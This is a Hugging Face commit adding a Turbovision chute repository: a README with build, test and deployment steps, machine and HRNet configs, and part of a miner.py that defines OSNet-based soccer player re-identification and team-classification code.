aivertex95827 SuperBitDev committed
Commit 9c8c43f · 0 parent(s)

Duplicate from SuperBitDev/turbo2


Co-authored-by: Evan Low <SuperBitDev@users.noreply.huggingface.co>

.gitattributes ADDED
@@ -0,0 +1,36 @@
+ *.7z filter=lfs diff=lfs merge=lfs -text
+ *.arrow filter=lfs diff=lfs merge=lfs -text
+ *.bin filter=lfs diff=lfs merge=lfs -text
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
+ *.ftz filter=lfs diff=lfs merge=lfs -text
+ *.gz filter=lfs diff=lfs merge=lfs -text
+ *.h5 filter=lfs diff=lfs merge=lfs -text
+ *.joblib filter=lfs diff=lfs merge=lfs -text
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
+ *.model filter=lfs diff=lfs merge=lfs -text
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
+ *.npy filter=lfs diff=lfs merge=lfs -text
+ *.npz filter=lfs diff=lfs merge=lfs -text
+ *.onnx filter=lfs diff=lfs merge=lfs -text
+ *.ot filter=lfs diff=lfs merge=lfs -text
+ *.parquet filter=lfs diff=lfs merge=lfs -text
+ *.pb filter=lfs diff=lfs merge=lfs -text
+ *.pickle filter=lfs diff=lfs merge=lfs -text
+ *.pkl filter=lfs diff=lfs merge=lfs -text
+ *.pt filter=lfs diff=lfs merge=lfs -text
+ *.pth filter=lfs diff=lfs merge=lfs -text
+ *.rar filter=lfs diff=lfs merge=lfs -text
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
+ *.tar filter=lfs diff=lfs merge=lfs -text
+ *.tflite filter=lfs diff=lfs merge=lfs -text
+ *.tgz filter=lfs diff=lfs merge=lfs -text
+ *.wasm filter=lfs diff=lfs merge=lfs -text
+ *.xz filter=lfs diff=lfs merge=lfs -text
+ *.zip filter=lfs diff=lfs merge=lfs -text
+ *.zst filter=lfs diff=lfs merge=lfs -text
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
+ osnet_model.pth.tar-100 filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,92 @@
+ # 🚀 Example Chute for Turbovision 🪂
+
+ This repository demonstrates how to deploy a **Chute** via the **Turbovision CLI**, hosted on **Hugging Face Hub**.
+ It serves as a minimal example showcasing the required structure and workflow for integrating machine learning models, preprocessing, and orchestration into a reproducible Chute environment.
+
+ ## Repository Structure
+ The following two files **must be present** (in their current locations) for a successful deployment — their content can be modified as needed:
+
+ | File | Purpose |
+ |------|----------|
+ | `miner.py` | Defines the ML model type(s), orchestration, and all pre/postprocessing logic. |
+ | `config.yml` | Specifies the machine configuration (e.g., GPU type, memory, environment variables). |
+
+ Other files — e.g., model weights, utility scripts, or dependencies — are **optional** and can be included as needed by your model. Note: any required assets must be defined or contained **within this repo**, which is fully open-source, since all network-related operations (downloading challenge data, weights, etc.) are disabled **inside the Chute**. A minimal `miner.py` skeleton is sketched below.
+
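+ As a rough sketch (illustrative only; the `Miner` class name and its `__init__(path_hf_repo)` signature mirror this repo's `miner.py`, while everything else is a placeholder):
+
+ ```python
+ from pathlib import Path
+
+ class Miner:
+     def __init__(self, path_hf_repo: Path) -> None:
+         # Load models/weights from files shipped inside the repo:
+         # network access is disabled inside the Chute.
+         ...
+ ```
+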
+ ## Overview
+
+ Below is a high-level diagram showing the interaction between Hugging Face, Chutes and Turbovision:
+
+ ![](../images/miner.png)
+
+ ## Local Testing
+ After editing `config.yml` and `miner.py` and saving them to your Hugging Face repo, you will want to test that everything works locally.
+
+ 1. Copy the file `scorevision/chute_tmeplate/turbovision_chute.py.j2` as a Python file called `my_chute.py` and fill in the missing variables:
+ ```python
+ HF_REPO_NAME = "{{ huggingface_repository_name }}"
+ HF_REPO_REVISION = "{{ huggingface_repository_revision }}"
+ CHUTES_USERNAME = "{{ chute_username }}"
+ CHUTE_NAME = "{{ chute_name }}"
+ ```
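+
+ For example, with purely hypothetical values (substitute your own Hugging Face repo, revision and Chutes account):
+ ```python
+ HF_REPO_NAME = "your-username/your-chute-repo"
+ HF_REPO_REVISION = "main"
+ CHUTES_USERNAME = "your-chutes-username"
+ CHUTE_NAME = "my-chute"
+ ```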
+
+ 2. Run the following command to build the chute locally (caution: there are known issues with the Docker location when running this on a Mac):
+ ```bash
+ chutes build my_chute:chute --local --public
+ ```
+
+ 3. Run the Docker image just built (i.e. the one named after `CHUTE_NAME`) and enter it:
+ ```bash
+ docker run -p 8000:8000 -e CHUTES_EXECUTION_CONTEXT=REMOTE -it <image-name> /bin/bash
+ ```
+
+ 4. Run the file from within the container:
+ ```bash
+ chutes run my_chute:chute --dev --debug
+ ```
+
+ 5. In another terminal, test the local endpoints to ensure there are no bugs:
+ ```bash
+ curl -X POST http://localhost:8000/health -d '{}'
+ curl -X POST http://localhost:8000/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}'
+ ```
+
+ ## Live Testing
+ 1. If you have a chute with the same name (i.e. from a previous deployment), delete it first (or you will get an error when trying to build):
+ ```bash
+ chutes chutes list
+ ```
+ Take note of the chute id that you wish to delete (if any):
+ ```bash
+ chutes chutes delete <chute-id>
+ ```
+
+ You should also delete its associated image:
+ ```bash
+ chutes images list
+ ```
+ Take note of the chute image id:
+ ```bash
+ chutes images delete <chute-image-id>
+ ```
+
+ 2. Use Turbovision's CLI to build, deploy and commit on-chain. (Note: you can skip the on-chain commit using `--no-commit`. You can also specify a past Hugging Face revision to point to using `--revision`, and/or the local files you want to upload to your Hugging Face repo using `--model-path`.)
+ ```bash
+ sv -vv push
+ ```
+
+ 3. When completed, warm up the chute (if it's cold 🧊). (You can confirm its status using `chutes chutes list`, or `chutes chutes get <chute-id>` if you already know its id.) Note: warming up can sometimes take a while, but if the chute runs without errors (it should, if you've tested locally first) and there are sufficient nodes (i.e. machines) available matching the `config.yml` you specified, the chute should become hot 🔥!
+ ```bash
+ chutes warmup <chute-id>
+ ```
+
+ 4. Test the chute's endpoints:
+ ```bash
+ curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/health -d '{}' -H "Authorization: Bearer $CHUTES_API_KEY"
+ curl -X POST https://<YOUR-CHUTE-SLUG>.chutes.ai/predict -d '{"url": "https://scoredata.me/2025_03_14/35ae7a/h1_0f2ca0.mp4","meta": {}}' -H "Authorization: Bearer $CHUTES_API_KEY"
+ ```
+
+ 5. Test what your chute would get on a validator (this also applies any validation/integrity checks, which may fail if you did not use the Turbovision CLI above to deploy the chute):
+ ```bash
+ sv -vv run-once
+ ```
chute_config.yml ADDED
@@ -0,0 +1,29 @@
+ Image:
+   from_base: parachutes/python:3.12
+   run_command:
+     - pip install --upgrade setuptools wheel
+     - pip install --index-url https://download.pytorch.org/whl/cu128 torch torchvision
+     - pip install "ultralytics==8.3.222" "opencv-python-headless" "numpy" "pydantic"
+     - pip install scikit-learn
+     - pip install onnxruntime-gpu
+   set_workdir: /app
+   readme: "Image for chutes"
+
+ NodeSelector:
+   gpu_count: 1
+   min_vram_gb_per_gpu: 24
+   min_memory_gb: 32
+   min_cpu_count: 32
+
+   exclude:
+     - "5090"
+     - b200
+     - h200
+     - mi300x
+
+ Chute:
+   timeout_seconds: 900
+   concurrency: 4
+   max_instances: 5
+   scaling_threshold: 0.3
+   shutdown_after_seconds: 600000
hrnetv2_w48.yaml ADDED
@@ -0,0 +1,35 @@
+ MODEL:
+   IMAGE_SIZE: [960, 540]
+   NUM_JOINTS: 58
+   PRETRAIN: ''
+   EXTRA:
+     FINAL_CONV_KERNEL: 1
+     STAGE1:
+       NUM_MODULES: 1
+       NUM_BRANCHES: 1
+       BLOCK: BOTTLENECK
+       NUM_BLOCKS: [4]
+       NUM_CHANNELS: [64]
+       FUSE_METHOD: SUM
+     STAGE2:
+       NUM_MODULES: 1
+       NUM_BRANCHES: 2
+       BLOCK: BASIC
+       NUM_BLOCKS: [4, 4]
+       NUM_CHANNELS: [48, 96]
+       FUSE_METHOD: SUM
+     STAGE3:
+       NUM_MODULES: 4
+       NUM_BRANCHES: 3
+       BLOCK: BASIC
+       NUM_BLOCKS: [4, 4, 4]
+       NUM_CHANNELS: [48, 96, 192]
+       FUSE_METHOD: SUM
+     STAGE4:
+       NUM_MODULES: 3
+       NUM_BRANCHES: 4
+       BLOCK: BASIC
+       NUM_BLOCKS: [4, 4, 4, 4]
+       NUM_CHANNELS: [48, 96, 192, 384]
+       FUSE_METHOD: SUM
+
keypoint_detect.pt ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:7ea78fa76aaf94976a8eca428d6e3c59697a93430cba1a4603e20284b61f5113
+ size 264964645
miner.py ADDED
@@ -0,0 +1,1697 @@
+ # FULL miner.py (self-contained)
+ # -------------------------------------------------------------
+
+ import time
+ import cv2
+ import torch
+ import numpy as np
+ from pathlib import Path
+ from typing import Iterable, Generator, List, TypeVar, Tuple
+ from numpy import ndarray
+ from pydantic import BaseModel
+ from ultralytics import YOLO
+ import datetime
+ import logging
+ import os
+ import sys
+
+ logger = logging.getLogger(__name__)  # referenced by the HRNet code further down
+
+ # ------------------------------
+ # DATA MODELS
+ # ------------------------------
+
+ class BoundingBox(BaseModel):
+     x1: int
+     y1: int
+     x2: int
+     y2: int
+     cls_id: int
+     conf: float
+     track_id: int | None = None
+
+
+ class TVFrameResult(BaseModel):
+     frame_id: int
+     boxes: list[BoundingBox]
+     keypoints: list[tuple[int, int]]
+
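+ # Example (illustrative): one tracked player box and no pitch keypoints yet --
+ # TVFrameResult(
+ #     frame_id=0,
+ #     boxes=[BoundingBox(x1=10, y1=20, x2=50, y2=120, cls_id=2, conf=0.9, track_id=7)],
+ #     keypoints=[],
+ # )
+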
+ # ------------------------------
+ # BATCH UTILITY
+ # ------------------------------
+
+ V = TypeVar("V")
+ kp_threshold = 0.3
+
+ def create_batches(sequence: Iterable[V], batch_size: int) -> Generator[List[V], None, None]:
+     batch_size = max(batch_size, 1)
+     current_batch = []
+     for element in sequence:
+         if len(current_batch) == batch_size:
+             yield current_batch
+             current_batch = []
+         current_batch.append(element)
+     if current_batch:
+         yield current_batch
+
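+ # Example (illustrative):
+ # list(create_batches([1, 2, 3, 4, 5], 2)) == [[1, 2], [3, 4], [5]]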
+
+ # class TeamClassifier:
+ #     def __init__(self):
+ #         self.color_refs = []
+ #         self.fitted = False
+
+ #     def _center_crop(self, crop: np.ndarray) -> np.ndarray:
+ #         h, w = crop.shape[:2]
+ #         return crop[int(h*0.2):int(h*0.5), int(w*0.2):int(w*0.8)]
+
+ #     def _extract_color(self, crop: np.ndarray) -> float:
+ #         if crop is None or crop.size == 0:
+ #             return 0.0
+ #         crop = self._center_crop(crop)
+ #         hsv = cv2.cvtColor(crop, cv2.COLOR_BGR2HSV)
+ #         return float(hsv[:, :, 0].mean())
+
+ #     def fit(self, crops: list[np.ndarray]):
+ #         if len(crops) < 6:
+ #             return
+ #         hs = np.array([self._extract_color(c) for c in crops])
+ #         thresh = np.median(hs)
+ #         self.color_refs = [(h, 0 if h < thresh else 1) for h in hs]
+ #         self.fitted = True
+
+ #     def predict(self, crops: list[np.ndarray]) -> np.ndarray:
+ #         if not self.fitted:
+ #             self.fit(crops)
+ #         team_ids = []
+ #         for crop in crops:
+ #             h = self._extract_color(crop)
+ #             if not self.color_refs:
+ #                 team_ids.append(0)
+ #                 continue
+ #             ref_h, ref_team = min(self.color_refs, key=lambda t: abs(t[0] - h))
+ #             team_ids.append(ref_team)
+ #         return np.array(team_ids, dtype=int)
+
+ # ------------------------------
+ # TEAM CLASSIFIER
+ # ------------------------------
+
+
+ ##########
+ # OSNET
+ ##########
+
+ from torch import nn
+ from torch.nn import functional as F
+ from sklearn.cluster import KMeans
+ from PIL import Image
+ from collections import defaultdict
+
+ _OSNET_MODEL = None
+ team_classifier_path = None
+
+ BALL_ID = 0
+ GK_ID = 1
+ PLAYER_ID = 2
+ REF_ID = 3
+ # Team assignment: 6 = team 1, 7 = team 2; 8 = unassigned (outlier, e.g. misdetected referee/GK)
+ TEAM_1_ID = 6
+ TEAM_2_ID = 7
+
+ pretrained_urls = {
+     'osnet_x1_0':
+     'https://drive.google.com/uc?id=1LaG1EJpHrxdAxKnSCJ_i0u-nbxSAeiFY',
+ }
+
+ class ConvLayer(nn.Module):
+     """Convolution layer (conv + bn + relu)."""
+
+     def __init__(
+         self,
+         in_channels,
+         out_channels,
+         kernel_size,
+         stride=1,
+         padding=0,
+         groups=1,
+         IN=False
+     ):
+         super(ConvLayer, self).__init__()
+         self.conv = nn.Conv2d(
+             in_channels,
+             out_channels,
+             kernel_size,
+             stride=stride,
+             padding=padding,
+             bias=False,
+             groups=groups
+         )
+         if IN:
+             self.bn = nn.InstanceNorm2d(out_channels, affine=True)
+         else:
+             self.bn = nn.BatchNorm2d(out_channels)
+         self.relu = nn.ReLU(inplace=True)
+
+     def forward(self, x):
+         x = self.conv(x)
+         x = self.bn(x)
+         x = self.relu(x)
+         return x
+
+
+ class Conv1x1(nn.Module):
+     """1x1 convolution + bn + relu."""
+
+     def __init__(self, in_channels, out_channels, stride=1, groups=1):
+         super(Conv1x1, self).__init__()
+         self.conv = nn.Conv2d(
+             in_channels,
+             out_channels,
+             1,
+             stride=stride,
+             padding=0,
+             bias=False,
+             groups=groups
+         )
+         self.bn = nn.BatchNorm2d(out_channels)
+         self.relu = nn.ReLU(inplace=True)
+
+     def forward(self, x):
+         x = self.conv(x)
+         x = self.bn(x)
+         x = self.relu(x)
+         return x
+
+
+ class Conv1x1Linear(nn.Module):
+     """1x1 convolution + bn (w/o non-linearity)."""
+
+     def __init__(self, in_channels, out_channels, stride=1):
+         super(Conv1x1Linear, self).__init__()
+         self.conv = nn.Conv2d(
+             in_channels, out_channels, 1, stride=stride, padding=0, bias=False
+         )
+         self.bn = nn.BatchNorm2d(out_channels)
+
+     def forward(self, x):
+         x = self.conv(x)
+         x = self.bn(x)
+         return x
+
+
+ class Conv3x3(nn.Module):
+     """3x3 convolution + bn + relu."""
+
+     def __init__(self, in_channels, out_channels, stride=1, groups=1):
+         super(Conv3x3, self).__init__()
+         self.conv = nn.Conv2d(
+             in_channels,
+             out_channels,
+             3,
+             stride=stride,
+             padding=1,
+             bias=False,
+             groups=groups
+         )
+         self.bn = nn.BatchNorm2d(out_channels)
+         self.relu = nn.ReLU(inplace=True)
+
+     def forward(self, x):
+         x = self.conv(x)
+         x = self.bn(x)
+         x = self.relu(x)
+         return x
+
+
+ class LightConv3x3(nn.Module):
+     """Lightweight 3x3 convolution.
+
+     1x1 (linear) + dw 3x3 (nonlinear).
+     """
+
+     def __init__(self, in_channels, out_channels):
+         super(LightConv3x3, self).__init__()
+         self.conv1 = nn.Conv2d(
+             in_channels, out_channels, 1, stride=1, padding=0, bias=False
+         )
+         self.conv2 = nn.Conv2d(
+             out_channels,
+             out_channels,
+             3,
+             stride=1,
+             padding=1,
+             bias=False,
+             groups=out_channels
+         )
+         self.bn = nn.BatchNorm2d(out_channels)
+         self.relu = nn.ReLU(inplace=True)
+
+     def forward(self, x):
+         x = self.conv1(x)
+         x = self.conv2(x)
+         x = self.bn(x)
+         x = self.relu(x)
+         return x
+
+
+ ##########
+ # Building blocks for omni-scale feature learning
+ ##########
+ class ChannelGate(nn.Module):
+     """A mini-network that generates channel-wise gates conditioned on the input tensor."""
+
+     def __init__(
+         self,
+         in_channels,
+         num_gates=None,
+         return_gates=False,
+         gate_activation='sigmoid',
+         reduction=16,
+         layer_norm=False
+     ):
+         super(ChannelGate, self).__init__()
+         if num_gates is None:
+             num_gates = in_channels
+         self.return_gates = return_gates
+         self.global_avgpool = nn.AdaptiveAvgPool2d(1)
+         self.fc1 = nn.Conv2d(
+             in_channels,
+             in_channels // reduction,
+             kernel_size=1,
+             bias=True,
+             padding=0
+         )
+         self.norm1 = None
+         if layer_norm:
+             self.norm1 = nn.LayerNorm((in_channels // reduction, 1, 1))
+         self.relu = nn.ReLU(inplace=True)
+         self.fc2 = nn.Conv2d(
+             in_channels // reduction,
+             num_gates,
+             kernel_size=1,
+             bias=True,
+             padding=0
+         )
+         if gate_activation == 'sigmoid':
+             self.gate_activation = nn.Sigmoid()
+         elif gate_activation == 'relu':
+             self.gate_activation = nn.ReLU(inplace=True)
+         elif gate_activation == 'linear':
+             self.gate_activation = None
+         else:
+             raise RuntimeError(
+                 "Unknown gate activation: {}".format(gate_activation)
+             )
+
+     def forward(self, x):
+         input = x
+         x = self.global_avgpool(x)
+         x = self.fc1(x)
+         if self.norm1 is not None:
+             x = self.norm1(x)
+         x = self.relu(x)
+         x = self.fc2(x)
+         if self.gate_activation is not None:
+             x = self.gate_activation(x)
+         if self.return_gates:
+             return x
+         return input * x
+
+
+ class OSBlock(nn.Module):
+     """Omni-scale feature learning block."""
+
+     def __init__(
+         self,
+         in_channels,
+         out_channels,
+         IN=False,
+         bottleneck_reduction=4,
+         **kwargs
+     ):
+         super(OSBlock, self).__init__()
+         mid_channels = out_channels // bottleneck_reduction
+         self.conv1 = Conv1x1(in_channels, mid_channels)
+         self.conv2a = LightConv3x3(mid_channels, mid_channels)
+         self.conv2b = nn.Sequential(
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+         )
+         self.conv2c = nn.Sequential(
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+         )
+         self.conv2d = nn.Sequential(
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+             LightConv3x3(mid_channels, mid_channels),
+         )
+         self.gate = ChannelGate(mid_channels)
+         self.conv3 = Conv1x1Linear(mid_channels, out_channels)
+         self.downsample = None
+         if in_channels != out_channels:
+             self.downsample = Conv1x1Linear(in_channels, out_channels)
+         self.IN = None
+         if IN:
+             self.IN = nn.InstanceNorm2d(out_channels, affine=True)
+
+     def forward(self, x):
+         identity = x
+         x1 = self.conv1(x)
+         x2a = self.conv2a(x1)
+         x2b = self.conv2b(x1)
+         x2c = self.conv2c(x1)
+         x2d = self.conv2d(x1)
+         x2 = self.gate(x2a) + self.gate(x2b) + self.gate(x2c) + self.gate(x2d)
+         x3 = self.conv3(x2)
+         if self.downsample is not None:
+             identity = self.downsample(identity)
+         out = x3 + identity
+         if self.IN is not None:
+             out = self.IN(out)
+         return F.relu(out)
+
+
+ ##########
+ # Network architecture
+ ##########
+ class OSNet(nn.Module):
+     """Omni-Scale Network.
+
+     Reference:
+         - Zhou et al. Omni-Scale Feature Learning for Person Re-Identification. ICCV, 2019.
+         - Zhou et al. Learning Generalisable Omni-Scale Representations
+           for Person Re-Identification. TPAMI, 2021.
+     """
+
+     def __init__(
+         self,
+         num_classes,
+         blocks,
+         layers,
+         channels,
+         feature_dim=512,
+         loss='softmax',
+         IN=False,
+         **kwargs
+     ):
+         super(OSNet, self).__init__()
+         num_blocks = len(blocks)
+         assert num_blocks == len(layers)
+         assert num_blocks == len(channels) - 1
+         self.loss = loss
+         self.feature_dim = feature_dim
+
+         # convolutional backbone
+         self.conv1 = ConvLayer(3, channels[0], 7, stride=2, padding=3, IN=IN)
+         self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
+         self.conv2 = self._make_layer(
+             blocks[0],
+             layers[0],
+             channels[0],
+             channels[1],
+             reduce_spatial_size=True,
+             IN=IN
+         )
+         self.conv3 = self._make_layer(
+             blocks[1],
+             layers[1],
+             channels[1],
+             channels[2],
+             reduce_spatial_size=True
+         )
+         self.conv4 = self._make_layer(
+             blocks[2],
+             layers[2],
+             channels[2],
+             channels[3],
+             reduce_spatial_size=False
+         )
+         self.conv5 = Conv1x1(channels[3], channels[3])
+         self.global_avgpool = nn.AdaptiveAvgPool2d(1)
+         # fully connected layer
+         self.fc = self._construct_fc_layer(
+             self.feature_dim, channels[3], dropout_p=None
+         )
+         # identity classification layer
+         self.classifier = nn.Linear(self.feature_dim, num_classes)
+
+         self._init_params()
+
+     def _make_layer(
+         self,
+         block,
+         layer,
+         in_channels,
+         out_channels,
+         reduce_spatial_size,
+         IN=False
+     ):
+         layers = []
+
+         layers.append(block(in_channels, out_channels, IN=IN))
+         for i in range(1, layer):
+             layers.append(block(out_channels, out_channels, IN=IN))
+
+         if reduce_spatial_size:
+             layers.append(
+                 nn.Sequential(
+                     Conv1x1(out_channels, out_channels),
+                     nn.AvgPool2d(2, stride=2)
+                 )
+             )
+
+         return nn.Sequential(*layers)
+
+     def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None):
+         if fc_dims is None or fc_dims < 0:
+             self.feature_dim = input_dim
+             return None
+
+         if isinstance(fc_dims, int):
+             fc_dims = [fc_dims]
+
+         layers = []
+         for dim in fc_dims:
+             layers.append(nn.Linear(input_dim, dim))
+             layers.append(nn.BatchNorm1d(dim))
+             layers.append(nn.ReLU(inplace=True))
+             if dropout_p is not None:
+                 layers.append(nn.Dropout(p=dropout_p))
+             input_dim = dim
+
+         self.feature_dim = fc_dims[-1]
+
+         return nn.Sequential(*layers)
+
+     def _init_params(self):
+         for m in self.modules():
+             if isinstance(m, nn.Conv2d):
+                 nn.init.kaiming_normal_(
+                     m.weight, mode='fan_out', nonlinearity='relu'
+                 )
+                 if m.bias is not None:
+                     nn.init.constant_(m.bias, 0)
+
+             elif isinstance(m, nn.BatchNorm2d):
+                 nn.init.constant_(m.weight, 1)
+                 nn.init.constant_(m.bias, 0)
+
+             elif isinstance(m, nn.BatchNorm1d):
+                 nn.init.constant_(m.weight, 1)
+                 nn.init.constant_(m.bias, 0)
+
+             elif isinstance(m, nn.Linear):
+                 nn.init.normal_(m.weight, 0, 0.01)
+                 if m.bias is not None:
+                     nn.init.constant_(m.bias, 0)
+
+     def featuremaps(self, x):
+         x = self.conv1(x)
+         x = self.maxpool(x)
+         x = self.conv2(x)
+         x = self.conv3(x)
+         x = self.conv4(x)
+         x = self.conv5(x)
+         return x
+
+     def forward(self, x, return_featuremaps=False):
+         x = self.featuremaps(x)
+         if return_featuremaps:
+             return x
+         v = self.global_avgpool(x)
+         v = v.view(v.size(0), -1)
+         if self.fc is not None:
+             v = self.fc(v)
+         if not self.training:
+             return v
+         y = self.classifier(v)
+         if self.loss == 'softmax':
+             return y
+         elif self.loss == 'triplet':
+             return y, v
+         else:
+             raise KeyError("Unsupported loss: {}".format(self.loss))
+
+
+ def init_pretrained_weights(model, key=''):
+     """Initializes the model with pretrained weights.
+
+     Layers that don't match the pretrained layers in name or size are kept unchanged.
+     """
+     import os
+     import errno
+     import gdown
+     from collections import OrderedDict
+
+     def _get_torch_home():
+         ENV_TORCH_HOME = 'TORCH_HOME'
+         ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
+         DEFAULT_CACHE_DIR = '~/.cache'
+         torch_home = os.path.expanduser(
+             os.getenv(
+                 ENV_TORCH_HOME,
+                 os.path.join(
+                     os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch'
+                 )
+             )
+         )
+         return torch_home
+
+     torch_home = _get_torch_home()
+     model_dir = os.path.join(torch_home, 'checkpoints')
+     try:
+         os.makedirs(model_dir)
+     except OSError as e:
+         if e.errno == errno.EEXIST:
+             # Directory already exists, ignore.
+             pass
+         else:
+             # Unexpected OSError, re-raise.
+             raise
+     filename = key + '_imagenet.pth'
+     cached_file = os.path.join(model_dir, filename)
+
+     if not os.path.exists(cached_file):
+         gdown.download(pretrained_urls[key], cached_file, quiet=False)
+
+     state_dict = torch.load(cached_file)
+     model_dict = model.state_dict()
+     new_state_dict = OrderedDict()
+     matched_layers, discarded_layers = [], []
+
+     for k, v in state_dict.items():
+         if k.startswith('module.'):
+             k = k[7:]  # discard module.
+
+         if k in model_dict and model_dict[k].size() == v.size():
+             new_state_dict[k] = v
+             matched_layers.append(k)
+         else:
+             discarded_layers.append(k)
+
+     model_dict.update(new_state_dict)
+     model.load_state_dict(model_dict)
+
+     if len(matched_layers) == 0:
+         print(
+             'The pretrained weights from "{}" cannot be loaded, '
+             'please check the key names manually '
+             '(** ignored and continue **)'.format(cached_file)
+         )
+     else:
+         print(
+             'Successfully loaded imagenet pretrained weights from "{}"'.
+             format(cached_file)
+         )
+         if len(discarded_layers) > 0:
+             print(
+                 '** The following layers are discarded '
+                 'due to unmatched keys or layer size: {}'.
+                 format(discarded_layers)
+             )
+
+
+ ##########
+ # Instantiation
+ ##########
+ def osnet_x1_0(num_classes=1000, pretrained=True, loss='softmax', **kwargs):
+     # standard size (width x1.0)
+     model = OSNet(
+         num_classes,
+         blocks=[OSBlock, OSBlock, OSBlock],
+         layers=[2, 2, 2],
+         channels=[64, 256, 384, 512],
+         loss=loss,
+         **kwargs
+     )
+     # if pretrained:
+     #     init_pretrained_weights(model, key='osnet_x1_0')
+     return model
+
+ from typing import Generator, Iterable
+ import torchvision.transforms as T
+ from collections import OrderedDict
+ import os.path as osp
+
+ def load_checkpoint(fpath):
+     fpath = osp.abspath(osp.expanduser(fpath))
+     map_location = None if torch.cuda.is_available() else 'cpu'
+     # weights_only=False allows checkpoints that contain numpy/other objects (e.g. model.pth.tar-100)
+     checkpoint = torch.load(fpath, map_location=map_location, weights_only=False)
+     return checkpoint
+
+ def load_pretrained_weights(model, weight_path):
+     checkpoint = load_checkpoint(weight_path)
+     if 'state_dict' in checkpoint:
+         state_dict = checkpoint['state_dict']
+     else:
+         state_dict = checkpoint
+     model_dict = model.state_dict()
+     new_state_dict = OrderedDict()
+     matched_layers, discarded_layers = [], []
+     for k, v in state_dict.items():
+         if k.startswith('module.'):
+             k = k[7:]
+         if k in model_dict and model_dict[k].size() == v.size():
+             new_state_dict[k] = v
+             matched_layers.append(k)
+         else:
+             discarded_layers.append(k)
+     model_dict.update(new_state_dict)
+     model.load_state_dict(model_dict)
+
+ def load_osnet(device="cuda", weight_path=None):
+     """Build osnet_x1_0 and load weights from model.pth.tar-100 via load_pretrained_weights."""
+     model = osnet_x1_0(num_classes=1, loss='softmax', pretrained=False, use_gpu=device == 'cuda')
+     # if weight_path is None:
+     #     weight_path = Path(__file__).resolve().parent / "model.pth.tar-100"
+     weight_path = Path(weight_path)
+     if weight_path.exists():
+         load_pretrained_weights(model, str(weight_path))
+     model.eval()
+     model.to(device)
+     return model
+
+ def filter_player_boxes(
+     boxes: List[BoundingBox],
+     min_area: int = 1500
+ ) -> List[BoundingBox]:
+
+     players = []
+     for b in boxes:
+         if b.cls_id != 2:  # only players
+             continue
+         # area = (b.x2 - b.x1) * (b.y2 - b.y1)
+         # if area < min_area:
+         #     continue
+
+         players.append(b)
+
+     return players
+
+ # OSNet preprocess (same as team_cluster: Resize, ToTensor, ImageNet normalize)
+ OSNET_IMAGE_SIZE = (64, 32)  # (height, width)
+ OSNET_PREPROCESS = T.Compose([
+     T.Resize(OSNET_IMAGE_SIZE),
+     T.ToTensor(),
+     T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
+ ])
697
+
698
+ def crop_upper_body(frame: np.ndarray, box: BoundingBox) -> np.ndarray:
699
+ # h = box.y2 - box.y1
700
+ # y2 = box.y1 + int(0.6 * h)
701
+
702
+ return frame[
703
+ max(0, box.y1):max(0, box.y2),
704
+ max(0, box.x1):max(0, box.x2)
705
+ ]
706
+
707
+ def preprocess_osnet(crop: np.ndarray) -> torch.Tensor:
708
+ """BGR crop -> RGB PIL -> Resize, ToTensor, ImageNet Normalize (same as team_cluster)."""
709
+ rgb = cv2.cvtColor(crop, cv2.COLOR_BGR2RGB)
710
+ pil = Image.fromarray(rgb)
711
+ return OSNET_PREPROCESS(pil)
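+
+ # Example (illustrative): any HxWx3 BGR crop becomes a (3, 64, 32) float tensor,
+ # resized to OSNET_IMAGE_SIZE and ImageNet-normalised, ready to stack into a batch.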
+
+ def crop_upper_body(frame: np.ndarray, box: BoundingBox) -> np.ndarray:
+     # h = box.y2 - box.y1
+     # y2 = box.y1 + int(0.6 * h)
+
+     return frame[
+         max(0, box.y1):max(0, box.y2),
+         max(0, box.x1):max(0, box.x2)
+     ]
+
+ def preprocess_osnet(crop: np.ndarray) -> torch.Tensor:
+     """BGR crop -> RGB PIL -> Resize, ToTensor, ImageNet Normalize (same as team_cluster)."""
+     rgb = cv2.cvtColor(crop, cv2.COLOR_BGR2RGB)
+     pil = Image.fromarray(rgb)
+     return OSNET_PREPROCESS(pil)
+
+ @torch.no_grad()
+ def extract_osnet_embeddings(
+     frames: List[np.ndarray],
+     # batch_boxes: List[List[BoundingBox]],
+     batch_boxes: dict[int, List[BoundingBox]],
+     device="cuda"
+ ) -> Tuple[np.ndarray, List[BoundingBox]]:
+
+     crops = []
+     meta = []
+     for frame, frame_index, boxes in zip(frames, batch_boxes.keys(), batch_boxes.values()):
+         players = filter_player_boxes(boxes)
+
+         for box in players:
+             crop = crop_upper_body(frame, box)
+             if crop.size == 0:
+                 continue
+
+             crops.append(preprocess_osnet(crop))
+             meta.append(box)
+
+     if not crops:
+         return None, None
+
+     batch = torch.stack(crops).to(device)
+     with torch.no_grad():  # grad-free inference (redundant with the decorator, but harmless)
+         batch = batch.float().to(device)
+         embeddings = _OSNET_MODEL(batch)  # (N, 256)
+         del batch
+         torch.cuda.empty_cache()
+
+     embeddings = embeddings.cpu().numpy()
+     # embeddings /= np.linalg.norm(embeddings, axis=1, keepdims=True)
+
+     return embeddings, meta
+
+ def aggregate_by_track(
+     embeddings: np.ndarray,
+     meta: List[BoundingBox]
+ ):
+     track_map = defaultdict(list)
+     box_map = {}
+
